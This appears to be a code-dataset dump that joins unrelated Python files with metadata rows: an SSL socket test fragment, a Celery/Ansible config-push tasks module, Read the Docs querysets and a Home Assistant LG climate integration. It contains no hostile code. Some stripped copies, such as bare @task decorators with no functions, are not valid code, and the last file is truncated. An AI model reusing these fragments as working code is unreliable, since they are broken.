('TLS-RSA-WITH-AES-256-GCM-SHA384', 'TLSv1.1', -1) assert ssl_sock.send(b'hello') == 5 assert ssl_sock.recv(7) == b'goodbye' def test_server(): with open('server.crt', 'w') as f: f.write('bar') with open('server.key', 'w') as f: f.write('fie') socket_stub.set_accept(0) context = ssl.SSLContext(ssl.PROTOCOL_TLS) context.load_cert_chain("server.crt", keyfile="server.key") listener_sock = socket.socket() listener_sock.bind(('192.168.0.1', 8080)) listener_sock.listen(5) sock, _ = listener_sock.accept() ssl_sock = context.wrap_socket(sock, server_side=True) assert ssl_sock.get_server_hostname() is None assert ssl_sock.cipher() == ('TLS-RSA-WITH-AES-256-GCM-SHA384', 'TLSv1.1', -1) assert ssl_sock.recv(5) == b'hello' assert ssl_sock.send(b'goodbye') == 7 TESTCASES = [ (test_print, "test_print"), (test_client, "test_client"), (test_server, "test_server") ]
1,636
0
69
34408d0df213d02bbeba41e708fedfed3c63febc
9,443
py
Python
xbmanIntegrated/SCMS/tasks.py
suntao789/Aclsm
2202201c8279391386a4569e69f93d90eca5b96a
[ "Apache-2.0" ]
38
2018-01-17T03:32:25.000Z
2021-03-05T03:10:13.000Z
xbmanIntegrated/SCMS/tasks.py
suntao789/Aclsm
2202201c8279391386a4569e69f93d90eca5b96a
[ "Apache-2.0" ]
null
null
null
xbmanIntegrated/SCMS/tasks.py
suntao789/Aclsm
2202201c8279391386a4569e69f93d90eca5b96a
[ "Apache-2.0" ]
17
2018-05-29T06:50:10.000Z
2021-07-08T01:47:22.000Z
#!/usr/bin/env python #-*- coding:utf-8 -*- __author__ = 'weihaoxuan' from celery import task from confile_process import process import models import os # import ansible_api @task @task @task @task @task @task @task @task @task
43.92093
122
0.595785
#!/usr/bin/env python #-*- coding:utf-8 -*- __author__ = 'weihaoxuan' from celery import task from confile_process import process import models import os # import ansible_api @task def nginxdev_push(file,pclist,puthdir): iplist = [] log = [] confname, path = process().nginx_conf(id=file) for i in pclist: item = models.device_config.objects.get(id=i) iplist.append(item.ipaddress) obj = models.task(task_name='nginx推送',config_name=confname, task_Operated=','.join(iplist),task_result=3) obj.save() obj_id = obj.id if len(puthdir.strip()) == 0: module_args = 'src=%s dest=/tmp/nginx.conf'%path else: module_args = 'src=%s dest=/%s/nginx.conf' %(path,puthdir.strip().strip('/')) date = ansible_api.MyRunner().cmdrun(pattern=','.join(iplist),module_name='copy', module_args=module_args)['contacted'] task_result = 1 for i in iplist: try: log.append(i + ':') log.append(str(date[i]['changed']) + '\n') except Exception,e: log.append(str(date[i]['msg']) + '\n') task_result = 2 continue models.task.objects.filter(id=obj_id).update(task_result=task_result,task_log='\n'.join(log)) @task def nginxgroup_push(group,file): log = [] item = models.group_config.objects.get(id=group) confname,path = process().nginx_conf(id=file) obj = models.task(task_name='nginx组推送',config_name=confname, task_Operated=item.group_name,task_result=3) obj.save() obj_id = obj.id if len(item.nginx_puth.strip()) == 0: module_args = 'src=%s dest=/tmp/nginx.conf' % path else: module_args = 'src=%s dest=/%s/nginx.conf' % (path, item.nginx_puth.strip().strip('/')) try: for i in models.device_config.objects.filter(group=group): date = ansible_api.MyRunner().cmdrun(pattern=i.ipaddress,module_name='copy', module_args=module_args)['contacted'] log.append(i.ipaddress + ':') log.append(str(date[i.ipaddress]['changed']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1,task_log='\n'.join(log)) except Exception,e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def tomcatdev_push(file,pclist,puthdir): ipdict = {} log = [] confname,path = process().tomcat_conf(id=file) for i in pclist: item = models.device_config.objects.get(id=i) ipdict[item.ipaddress] = item.password obj = models.task(task_name='tomcat推送', config_name=confname, task_Operated=','.join(ipdict.keys()), task_result=3) obj.save() obj_id = obj.id if len(puthdir.strip()) == 0: module_args = 'src=%s dest=/tmp/server.xml' % path else: module_args = 'src=%s dest=/%s/server.xml' % (path,puthdir.strip().strip('/')) try: for k, y in ipdict.items(): date = ansible_api.MyRunner().cmdrun(pattern=k, module_name='copy', module_args=module_args)[ 'contacted'] log.append(k + ':') log.append(str(date[k]['changed']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception,e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def tomcatgroup_push(group,file): log = [] item = models.group_config.objects.get(id=group) confname, path = process().tomcat_conf(id=file) obj = models.task(task_name='tomcat组推送', config_name=confname, task_Operated=item.group_name, task_result=3) obj.save() obj_id = obj.id if len(item.tomcat_puth.strip()) == 0: module_args = 'src=%s dest=/tmp/server.xml' % path else: module_args = 'src=%s dest=/%s/server.xml' % (path, item.tomcat_puth.strip().strip('/')) try: for i in models.device_config.objects.filter(group=group): date = ansible_api.MyRunner().cmdrun(pattern=i.ipaddress, 
module_name='copy', module_args=module_args)[ 'contacted'] log.append(i.ipaddress + ':') log.append(str(date[i.ipaddress]['changed']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception,e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def ninstall_push(pclist,id): ipdict = {} log = [] confname, path = process().nginxinstall_conf(id=id) for i in pclist: item = models.device_config.objects.get(id=i) ipdict[item.ipaddress] = item.password obj = models.task(task_name='nginx安装', config_name=confname, task_Operated=','.join(ipdict.keys()), task_result=3) obj.save() obj_id = obj.id try: for k, y in ipdict.items(): date = ansible_api.MyRunner().PlayBook_execute(play=path,params='{"host": "%s"}'%k) log.append(k + ':') log.append(str(date[k]['failures']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def ninstallgroup_push(group_id,id): log = [] item = models.group_config.objects.get(id=group_id) confname, path = process().nginxinstall_conf(id=id) obj = models.task(task_name='nginx组安装', config_name=confname, task_Operated=item.group_name, task_result=3) obj.save() obj_id = obj.id try: for i in models.device_config.objects.filter(group=group_id): date = ansible_api.MyRunner().PlayBook_execute(play=path,params='{"host": "%s"}'%i.ipaddress) log.append(i.ipaddress + ':') log.append(str(date[i.ipaddress]['failures']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def tinstall_push(pclist,id): ipdict = {} log = [] confname, path = process().tomcatinstall_conf(id=id) for i in pclist: item = models.device_config.objects.get(id=i) ipdict[item.ipaddress] = item.password obj = models.task(task_name='tomcat安装', config_name=confname, task_Operated=','.join(ipdict.keys()), task_result=3) obj.save() obj_id = obj.id try: for k, y in ipdict.items(): date = ansible_api.MyRunner().PlayBook_execute(play=path, params='{"host": "%s"}' % k) log.append(k + ':') log.append(str(date[k]['failures']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def tinstallgroup_push(group_id,id): log = [] item = models.group_config.objects.get(id=group_id) confname, path = process().tomcatinstall_conf(id=id) obj = models.task(task_name='tomcat组安装', config_name=confname, task_Operated=item.group_name, task_result=3) obj.save() obj_id = obj.id try: for i in models.device_config.objects.filter(group=group_id): date = ansible_api.MyRunner().PlayBook_execute(play=path,params='{"host": "%s"}' % i.ipaddress) log.append(i.ipaddress + ':') log.append(str(date[i.ipaddress]['failures']) + '\n') models.task.objects.filter(id=obj_id).update(task_result=1, task_log='\n'.join(log)) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!') @task def playbook(p_id,p_name,inventory=None): basedir = models.Playbook.objects.get(id=p_id) path = os.path.join(basedir.basedir.split('.')[0], p_name) obj = models.task(task_name='playbook执行', 
config_name='不涉及', task_Operated='不涉及', task_result=3) obj.save() obj_id = obj.id try: if inventory: date = ansible_api.MyRunner().roles_execute(play=path, inventory=os.path.join(basedir.basedir.split('.')[0],'inventory')) else: date = ansible_api.MyRunner().roles_execute(play=path) models.task.objects.filter(id=obj_id).update(task_result=1, task_log=date) except Exception, e: models.task.objects.filter(id=obj_id).update(task_result=2, task_log='被控制机没有安装libselinux-python,或网络不可达!')
9,317
0
198
1d057d22f7e979ae15ce1bdc1772f344ee6c4a54
9,204
py
Python
readthedocs/builds/querysets.py
shazelquist/readthedocs.org
25c0f5d9528bd92db3c62db91e8eed8032d01b01
[ "MIT" ]
null
null
null
readthedocs/builds/querysets.py
shazelquist/readthedocs.org
25c0f5d9528bd92db3c62db91e8eed8032d01b01
[ "MIT" ]
1
2022-03-02T11:55:37.000Z
2022-03-02T11:55:37.000Z
readthedocs/builds/querysets.py
shazelquist/readthedocs.org
25c0f5d9528bd92db3c62db91e8eed8032d01b01
[ "MIT" ]
null
null
null
"""Build and Version QuerySet classes.""" import datetime import logging from django.db import models from django.db.models import Q from django.utils import timezone from readthedocs.builds.constants import ( BUILD_STATE_FINISHED, BUILD_STATE_TRIGGERED, EXTERNAL, ) from readthedocs.core.permissions import AdminPermission from readthedocs.core.utils.extend import SettingsOverrideObject from readthedocs.projects import constants from readthedocs.projects.models import Project log = logging.getLogger(__name__) __all__ = ['VersionQuerySet', 'BuildQuerySet', 'RelatedBuildQuerySet'] class VersionQuerySetBase(models.QuerySet): """Versions take into account their own privacy_level setting.""" use_for_related_fields = True def __init__(self, *args, internal_only=False, external_only=False, **kwargs): """ Overridden to pass extra arguments from the manager. Usage: import functools ManagerClass.from_queryset( functools.partial(VersionQuerySet, internal_only=True) ) :param bool internal_only: If this queryset is being used to query internal versions only. :param bool external_only: If this queryset is being used to query external versions only. """ self.internal_only = internal_only self.external_only = external_only super().__init__(*args, **kwargs) def _add_from_user_projects(self, queryset, user, admin=False, member=False): """Add related objects from projects where `user` is an `admin` or a `member`.""" if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=admin, member=member, ) .values_list('pk', flat=True) ) user_queryset = self.filter(project__in=projects_pk) queryset = user_queryset | queryset return queryset def public( self, user=None, project=None, only_active=True, include_hidden=True, only_built=False, ): """ Get all allowed versions. .. note:: External versions use the `Project.external_builds_privacy_level` field instead of its `privacy_level` field. """ queryset = self._public_only() if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects(queryset, user) if project: queryset = queryset.filter(project=project) if only_active: queryset = queryset.filter(active=True) if only_built: queryset = queryset.filter(built=True) if not include_hidden: queryset = queryset.filter(hidden=False) return queryset.distinct() class BuildQuerySet(models.QuerySet): """ Build objects that are privacy aware. i.e. they take into account the privacy of the Version that they relate to. """ use_for_related_fields = True def _add_from_user_projects(self, queryset, user, admin=False, member=False): """Add related objects from projects where `user` is an `admin` or a `member`.""" if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=admin, member=member, ) .values_list('pk', flat=True) ) user_queryset = self.filter(project__in=projects_pk) queryset = user_queryset | queryset return queryset def public(self, user=None, project=None): """ Get all allowed builds. Builds are public if the linked version and project are public. .. note:: External versions use the `Project.external_builds_privacy_level` field instead of its `privacy_level` field. 
""" queryset = ( self.filter( version__privacy_level=constants.PUBLIC, version__project__privacy_level=constants.PUBLIC, ) .exclude(version__type=EXTERNAL) ) queryset |= self.filter( version__type=EXTERNAL, project__external_builds_privacy_level=constants.PUBLIC, project__privacy_level=constants.PUBLIC, ) if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects( queryset, user, admin=True, member=True, ) if project: queryset = queryset.filter(project=project) return queryset.distinct() def concurrent(self, project): """ Check if the max build concurrency for this project was reached. - regular project: counts concurrent builds - translation: concurrent builds of all the translations + builds of main project .. note:: If the project/translation belongs to an organization, we count all concurrent builds for all the projects from the organization. :rtype: tuple :returns: limit_reached, number of concurrent builds, number of max concurrent """ limit_reached = False query = Q( project__slug=project.slug, # Limit builds to 5 hours ago to speed up the query date__gte=timezone.now() - datetime.timedelta(hours=5), ) if project.main_language_project: # Project is a translation, counts all builds of all the translations query |= Q(project__main_language_project=project.main_language_project) query |= Q(project__slug=project.main_language_project.slug) elif project.translations.exists(): # The project has translations, counts their builds as well query |= Q(project__in=project.translations.all()) # If the project belongs to an organization, count all the projects # from this organization as well organization = project.organizations.first() if organization: query |= Q(project__in=organization.projects.all()) concurrent = ( self.filter(query) .exclude(state__in=[BUILD_STATE_TRIGGERED, BUILD_STATE_FINISHED]) ).distinct().count() max_concurrent = Project.objects.max_concurrent_builds(project) log.info( 'Concurrent builds. project=%s running=%s max=%s', project.slug, concurrent, max_concurrent, ) if concurrent >= max_concurrent: limit_reached = True return (limit_reached, concurrent, max_concurrent) class RelatedBuildQuerySet(models.QuerySet): """ For models with association to a project through :py:class:`Build`. .. note:: This is only used for ``BuildCommandViewSet`` from api v2. Which is being used to upload build command results from the builders. """ use_for_related_fields = True
32.638298
98
0.609518
"""Build and Version QuerySet classes.""" import datetime import logging from django.db import models from django.db.models import Q from django.utils import timezone from readthedocs.builds.constants import ( BUILD_STATE_FINISHED, BUILD_STATE_TRIGGERED, EXTERNAL, ) from readthedocs.core.permissions import AdminPermission from readthedocs.core.utils.extend import SettingsOverrideObject from readthedocs.projects import constants from readthedocs.projects.models import Project log = logging.getLogger(__name__) __all__ = ['VersionQuerySet', 'BuildQuerySet', 'RelatedBuildQuerySet'] class VersionQuerySetBase(models.QuerySet): """Versions take into account their own privacy_level setting.""" use_for_related_fields = True def __init__(self, *args, internal_only=False, external_only=False, **kwargs): """ Overridden to pass extra arguments from the manager. Usage: import functools ManagerClass.from_queryset( functools.partial(VersionQuerySet, internal_only=True) ) :param bool internal_only: If this queryset is being used to query internal versions only. :param bool external_only: If this queryset is being used to query external versions only. """ self.internal_only = internal_only self.external_only = external_only super().__init__(*args, **kwargs) def _add_from_user_projects(self, queryset, user, admin=False, member=False): """Add related objects from projects where `user` is an `admin` or a `member`.""" if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=admin, member=member, ) .values_list('pk', flat=True) ) user_queryset = self.filter(project__in=projects_pk) queryset = user_queryset | queryset return queryset def _public_only(self): if self.internal_only: # Since internal versions are already filtered, # don't do anything special. queryset = self.filter(privacy_level=constants.PUBLIC) elif self.external_only: # Since external versions are already filtered, # don't filter them again. queryset = self.filter( project__external_builds_privacy_level=constants.PUBLIC, ) else: queryset = self.filter(privacy_level=constants.PUBLIC).exclude(type=EXTERNAL) queryset |= self.filter( type=EXTERNAL, project__external_builds_privacy_level=constants.PUBLIC, ) return queryset def public( self, user=None, project=None, only_active=True, include_hidden=True, only_built=False, ): """ Get all allowed versions. .. note:: External versions use the `Project.external_builds_privacy_level` field instead of its `privacy_level` field. """ queryset = self._public_only() if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects(queryset, user) if project: queryset = queryset.filter(project=project) if only_active: queryset = queryset.filter(active=True) if only_built: queryset = queryset.filter(built=True) if not include_hidden: queryset = queryset.filter(hidden=False) return queryset.distinct() def api(self, user=None): return self.public(user, only_active=False) class VersionQuerySet(SettingsOverrideObject): _default_class = VersionQuerySetBase class BuildQuerySet(models.QuerySet): """ Build objects that are privacy aware. i.e. they take into account the privacy of the Version that they relate to. 
""" use_for_related_fields = True def _add_from_user_projects(self, queryset, user, admin=False, member=False): """Add related objects from projects where `user` is an `admin` or a `member`.""" if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=admin, member=member, ) .values_list('pk', flat=True) ) user_queryset = self.filter(project__in=projects_pk) queryset = user_queryset | queryset return queryset def public(self, user=None, project=None): """ Get all allowed builds. Builds are public if the linked version and project are public. .. note:: External versions use the `Project.external_builds_privacy_level` field instead of its `privacy_level` field. """ queryset = ( self.filter( version__privacy_level=constants.PUBLIC, version__project__privacy_level=constants.PUBLIC, ) .exclude(version__type=EXTERNAL) ) queryset |= self.filter( version__type=EXTERNAL, project__external_builds_privacy_level=constants.PUBLIC, project__privacy_level=constants.PUBLIC, ) if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects( queryset, user, admin=True, member=True, ) if project: queryset = queryset.filter(project=project) return queryset.distinct() def api(self, user=None): return self.public(user) def concurrent(self, project): """ Check if the max build concurrency for this project was reached. - regular project: counts concurrent builds - translation: concurrent builds of all the translations + builds of main project .. note:: If the project/translation belongs to an organization, we count all concurrent builds for all the projects from the organization. :rtype: tuple :returns: limit_reached, number of concurrent builds, number of max concurrent """ limit_reached = False query = Q( project__slug=project.slug, # Limit builds to 5 hours ago to speed up the query date__gte=timezone.now() - datetime.timedelta(hours=5), ) if project.main_language_project: # Project is a translation, counts all builds of all the translations query |= Q(project__main_language_project=project.main_language_project) query |= Q(project__slug=project.main_language_project.slug) elif project.translations.exists(): # The project has translations, counts their builds as well query |= Q(project__in=project.translations.all()) # If the project belongs to an organization, count all the projects # from this organization as well organization = project.organizations.first() if organization: query |= Q(project__in=organization.projects.all()) concurrent = ( self.filter(query) .exclude(state__in=[BUILD_STATE_TRIGGERED, BUILD_STATE_FINISHED]) ).distinct().count() max_concurrent = Project.objects.max_concurrent_builds(project) log.info( 'Concurrent builds. project=%s running=%s max=%s', project.slug, concurrent, max_concurrent, ) if concurrent >= max_concurrent: limit_reached = True return (limit_reached, concurrent, max_concurrent) class RelatedBuildQuerySet(models.QuerySet): """ For models with association to a project through :py:class:`Build`. .. note:: This is only used for ``BuildCommandViewSet`` from api v2. Which is being used to upload build command results from the builders. 
""" use_for_related_fields = True def _add_from_user_projects(self, queryset, user): if user and user.is_authenticated: projects_pk = ( AdminPermission.projects( user=user, admin=True, member=True, ) .values_list('pk', flat=True) ) user_queryset = self.filter(build__project__in=projects_pk) queryset = user_queryset | queryset return queryset def public(self, user=None): queryset = self.filter(build__version__privacy_level=constants.PUBLIC) if user: if user.is_superuser: queryset = self.all() else: queryset = self._add_from_user_projects(queryset, user) return queryset.distinct() def api(self, user=None): return self.public(user)
1,629
66
185
70697284aed98a0a1ec55f4830a7d80f5a7ab937
14,978
py
Python
homeassistant/config/custom_components/smartthinq_sensors/climate.py
yuvalabou/homeassistant
e25885db33d2144455928d07d7e9b044278ba291
[ "Unlicense" ]
14
2020-03-25T17:14:17.000Z
2020-04-19T02:03:48.000Z
homeassistant/config/custom_components/smartthinq_sensors/climate.py
yuvalabou/homeassistant
e25885db33d2144455928d07d7e9b044278ba291
[ "Unlicense" ]
16
2020-03-26T03:32:03.000Z
2020-04-18T21:28:54.000Z
homeassistant/config/custom_components/smartthinq_sensors/climate.py
yuvalabou/homeassistant
e25885db33d2144455928d07d7e9b044278ba291
[ "Unlicense" ]
6
2020-03-28T19:41:18.000Z
2020-04-13T14:04:18.000Z
"""Platform for LGE climate integration.""" from __future__ import annotations from dataclasses import dataclass from datetime import timedelta import logging from typing import Any, Awaitable, Callable, List, Tuple from .wideq import ( FEAT_HUMIDITY, FEAT_OUT_WATER_TEMP, UNIT_TEMP_FAHRENHEIT, DeviceType, ) from .wideq.ac import AirConditionerDevice, ACMode from homeassistant.components.climate import ClimateEntity, ClimateEntityDescription from homeassistant.components.climate.const import ( ATTR_HVAC_MODE, DEFAULT_MAX_TEMP, DEFAULT_MIN_TEMP, ClimateEntityFeature, HVACMode, ) from homeassistant.config_entries import ConfigEntry from homeassistant.const import ATTR_TEMPERATURE, TEMP_CELSIUS, TEMP_FAHRENHEIT from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.update_coordinator import CoordinatorEntity from . import LGEDevice from .const import DOMAIN, LGE_DEVICES from .device_helpers import ( TEMP_UNIT_LOOKUP, LGERefrigeratorDevice, get_entity_name, ) # general ac attributes ATTR_FRIDGE = "fridge" ATTR_FREEZER = "freezer" HVAC_MODE_LOOKUP: dict[str, HVACMode] = { ACMode.ENERGY_SAVER.name: HVACMode.AUTO, ACMode.AI.name: HVACMode.AUTO, ACMode.HEAT.name: HVACMode.HEAT, ACMode.DRY.name: HVACMode.DRY, ACMode.COOL.name: HVACMode.COOL, ACMode.FAN.name: HVACMode.FAN_ONLY, ACMode.ACO.name: HVACMode.HEAT_COOL, } ATTR_SWING_HORIZONTAL = "swing_mode_horizontal" ATTR_SWING_VERTICAL = "swing_mode_vertical" SWING_PREFIX = ["Vertical", "Horizontal"] SCAN_INTERVAL = timedelta(seconds=120) _LOGGER = logging.getLogger(__name__) @dataclass class ThinQRefClimateRequiredKeysMixin: """Mixin for required keys.""" range_temp_fn: Callable[[Any], List[float]] set_temp_fn: Callable[[Any, float], Awaitable[None]] temp_fn: Callable[[Any], float | str] @dataclass class ThinQRefClimateEntityDescription( ClimateEntityDescription, ThinQRefClimateRequiredKeysMixin ): """A class that describes ThinQ climate entities.""" REFRIGERATOR_CLIMATE: Tuple[ThinQRefClimateEntityDescription, ...] 
= ( ThinQRefClimateEntityDescription( key=ATTR_FRIDGE, name="Fridge", icon="mdi:fridge-top", range_temp_fn=lambda x: x.device.fridge_target_temp_range, set_temp_fn=lambda x, y: x.device.set_fridge_target_temp(y), temp_fn=lambda x: x.temp_fridge, ), ThinQRefClimateEntityDescription( key=ATTR_FREEZER, name="Freezer", icon="mdi:fridge-bottom", range_temp_fn=lambda x: x.device.freezer_target_temp_range, set_temp_fn=lambda x, y: x.device.set_freezer_target_temp(y), temp_fn=lambda x: x.temp_freezer, ), ) def remove_prefix(text: str, prefix: str) -> str: """Remove a prefix from a string.""" if text.startswith(prefix): return text[len(prefix):] return text async def async_setup_entry( hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback ) -> None: """Set up LGE device climate based on config_entry.""" entry_config = hass.data[DOMAIN] lge_devices = entry_config.get(LGE_DEVICES) if not lge_devices: return _LOGGER.debug("Starting LGE ThinQ climate setup...") lge_climates = [] # AC devices lge_climates.extend( [ LGEACClimate(lge_device) for lge_device in lge_devices.get(DeviceType.AC, []) ] ) # Refrigerator devices lge_climates.extend( [ LGERefrigeratorClimate(lge_device, refrigerator_desc) for refrigerator_desc in REFRIGERATOR_CLIMATE for lge_device in lge_devices.get(DeviceType.REFRIGERATOR, []) ] ) async_add_entities(lge_climates) class LGEClimate(CoordinatorEntity, ClimateEntity): """Base climate device.""" def __init__(self, api: LGEDevice): """Initialize the climate.""" super().__init__(api.coordinator) self._api = api self._attr_device_info = api.device_info @property def should_poll(self) -> bool: """Return True if entity has to be polled for state. We overwrite coordinator property default setting because we need to poll to avoid the effect that after changing a climate settings it is immediately set to prev state. The async_update method here do nothing because the real update is performed by coordinator. """ return True async def async_update(self) -> None: """Update the entity. This is a fake update, real update is done by coordinator. 
""" return @property def available(self) -> bool: """Return True if entity is available.""" return self._api.available class LGEACClimate(LGEClimate): """Air-to-Air climate device.""" def __init__(self, api: LGEDevice) -> None: """Initialize the climate.""" super().__init__(api) self._device: AirConditionerDevice = api.device self._attr_name = api.name self._attr_unique_id = f"{api.unique_id}-AC" self._attr_fan_modes = self._device.fan_speeds self._attr_swing_modes = [ f"{SWING_PREFIX[0]}{mode}" for mode in self._device.vertical_step_modes ] + [ f"{SWING_PREFIX[1]}{mode}" for mode in self._device.horizontal_step_modes ] self._hvac_mode_lookup: dict[str, HVACMode] | None = None self._support_ver_swing = len(self._device.vertical_step_modes) > 0 self._support_hor_swing = len(self._device.horizontal_step_modes) > 0 self._set_hor_swing = self._support_hor_swing and not self._support_ver_swing def _available_hvac_modes(self) -> dict[str, HVACMode]: """Return available hvac modes from lookup dict.""" if self._hvac_mode_lookup is None: modes = {} for key, mode in HVAC_MODE_LOOKUP.items(): if key in self._device.op_modes: # invert key and mode to avoid duplicated HVAC modes modes[mode] = key self._hvac_mode_lookup = {v: k for k, v in modes.items()} return self._hvac_mode_lookup def _get_swing_mode(self, hor_mode=False) -> str | None: """Return the current swing mode for vert of hor mode.""" if hor_mode: mode = self._api.state.horizontal_step_mode else: mode = self._api.state.vertical_step_mode if mode: return f"{SWING_PREFIX[1 if hor_mode else 0]}{mode}" return None @property def supported_features(self) -> int: """Return the list of supported features.""" features = ClimateEntityFeature.TARGET_TEMPERATURE if len(self.fan_modes) > 0: features |= ClimateEntityFeature.FAN_MODE if self._support_ver_swing or self._support_hor_swing: features |= ClimateEntityFeature.SWING_MODE return features @property def extra_state_attributes(self): """Return the optional state attributes with device specific additions.""" attr = {} if self._support_hor_swing: attr[ATTR_SWING_HORIZONTAL] = self._get_swing_mode(True) if self._support_ver_swing: attr[ATTR_SWING_VERTICAL] = self._get_swing_mode(False) return attr @property def target_temperature_step(self) -> float: """Return the supported step of target temperature.""" return self._device.target_temperature_step @property def temperature_unit(self) -> str: """Return the unit of measurement used by the platform.""" if self._device.temperature_unit == UNIT_TEMP_FAHRENHEIT: return TEMP_FAHRENHEIT return TEMP_CELSIUS @property def hvac_mode(self) -> HVACMode: """Return hvac operation ie. 
heat, cool mode.""" op_mode: str | None = self._api.state.operation_mode if not self._api.state.is_on or op_mode is None: return HVACMode.OFF modes = self._available_hvac_modes() return modes.get(op_mode, HVACMode.AUTO) async def async_set_hvac_mode(self, hvac_mode: HVACMode) -> None: """Set new target hvac mode.""" if hvac_mode == HVACMode.OFF: await self._device.power(False) return modes = self._available_hvac_modes() reverse_lookup = {v: k for k, v in modes.items()} operation_mode = reverse_lookup.get(hvac_mode) if operation_mode is None: raise ValueError(f"Invalid hvac_mode [{hvac_mode}]") if self.hvac_mode == HVACMode.OFF: await self._device.power(True) await self._device.set_op_mode(operation_mode) @property def hvac_modes(self) -> list[HVACMode]: """Return the list of available hvac operation modes.""" modes = self._available_hvac_modes() return [HVACMode.OFF] + list(modes.values()) @property def current_temperature(self) -> float: """Return the current temperature.""" curr_temp = None if self._device.is_air_to_water: curr_temp = self._api.state.device_features.get(FEAT_OUT_WATER_TEMP) if curr_temp is None: curr_temp = self._api.state.current_temp return curr_temp @property @property def target_temperature(self) -> float: """Return the temperature we try to reach.""" return self._api.state.target_temp async def async_set_temperature(self, **kwargs) -> None: """Set new target temperature.""" if hvac_mode := kwargs.get(ATTR_HVAC_MODE): await self.async_set_hvac_mode(HVACMode(hvac_mode)) if new_temp := kwargs.get(ATTR_TEMPERATURE): await self._device.set_target_temp(new_temp) @property def fan_mode(self) -> str | None: """Return the fan setting.""" return self._api.state.fan_speed async def async_set_fan_mode(self, fan_mode: str) -> None: """Set new target fan mode.""" if fan_mode not in self.fan_modes: raise ValueError(f"Invalid fan mode [{fan_mode}]") await self._device.set_fan_speed(fan_mode) @property def swing_mode(self) -> str | None: """Return the swing mode setting.""" if self._set_hor_swing and self._support_hor_swing: return self._get_swing_mode(True) return self._get_swing_mode(False) async def async_set_swing_mode(self, swing_mode: str) -> None: """Set new target swing mode.""" avl_mode = False curr_mode = None set_hor_swing = swing_mode.startswith(SWING_PREFIX[1]) dev_mode = remove_prefix( swing_mode, SWING_PREFIX[1 if set_hor_swing else 0] ) if set_hor_swing: if dev_mode in self._device.horizontal_step_modes: avl_mode = True curr_mode = self._api.state.horizontal_step_mode elif swing_mode.startswith(SWING_PREFIX[0]): if dev_mode in self._device.vertical_step_modes: avl_mode = True curr_mode = self._api.state.vertical_step_mode if not avl_mode: raise ValueError(f"Invalid swing_mode [{swing_mode}].") if curr_mode != dev_mode: if set_hor_swing: await self._device.set_horizontal_step_mode(dev_mode) else: await self._device.set_vertical_step_mode(dev_mode) self._set_hor_swing = set_hor_swing async def async_turn_on(self) -> None: """Turn the entity on.""" await self._device.power(True) async def async_turn_off(self) -> None: """Turn the entity off.""" await self._device.power(False) @property def min_temp(self) -> float: """Return the minimum temperature.""" if (min_value := self._device.target_temperature_min) is not None: return min_value return self._device.conv_temp_unit(DEFAULT_MIN_TEMP) @property def max_temp(self) -> float: """Return the maximum temperature.""" if (max_value := self._device.target_temperature_max) is not None: return max_value return 
self._device.conv_temp_unit(DEFAULT_MAX_TEMP) class LGERefrigeratorClimate(LGEClimate): """Refrigerator climate device.""" entity_description = ThinQRefClimateEntityDescription def __init__( self, api: LGEDevice, description: ThinQRefClimateEntityDescription, ) -> None: """Initialize the climate.""" super().__init__(api) self._wrap_device = LGERefrigeratorDevice(api) self.entity_description = description self._attr_name = get_entity_name(api, description.key, description.name) self._attr_unique_id = f"{api.unique_id}-{description.key}-AC" self._attr_hvac_modes = [HVACMode.AUTO] self._attr_hvac_mode = HVACMode.AUTO @property def supported_features(self) -> int: """Return the list of supported features.""" if not self._wrap_device.device.set_values_allowed: return 0 return ClimateEntityFeature.TARGET_TEMPERATURE @property def target_temperature_step(self) -> float: """Return the supported step of target temperature.""" return self._wrap_device.device.target_temperature_step @property def temperature_unit(self) -> str: """Return the unit of measurement used by the platform.""" if self._api.state: unit = self._api.state.temp_unit return TEMP_UNIT_LOOKUP.get(unit, TEMP_CELSIUS) return TEMP_CELSIUS @property def current_temperature(self) -> float | None: """Return the current temperature.""" curr_temp = self.entity_description.temp_fn(self._wrap_device) if curr_temp is None: return None try: return int(curr_temp) except ValueError: return None @property def target_temperature(self) -> float | None: """Return the temperature we try to reach.""" return self.current_temperature async def async_set_temperature(self, **kwargs) -> None: """Set new target temperature.""" if new_temp := kwargs.get(ATTR_TEMPERATURE): await self.entity_description.set_temp_fn(self._wrap_device, new_temp) @property def min_temp(self) -> float: """Return the minimum temperature.""" return self.entity_description.range_temp_fn(self._wrap_device)[0] @property
34.196347
85
0.664975
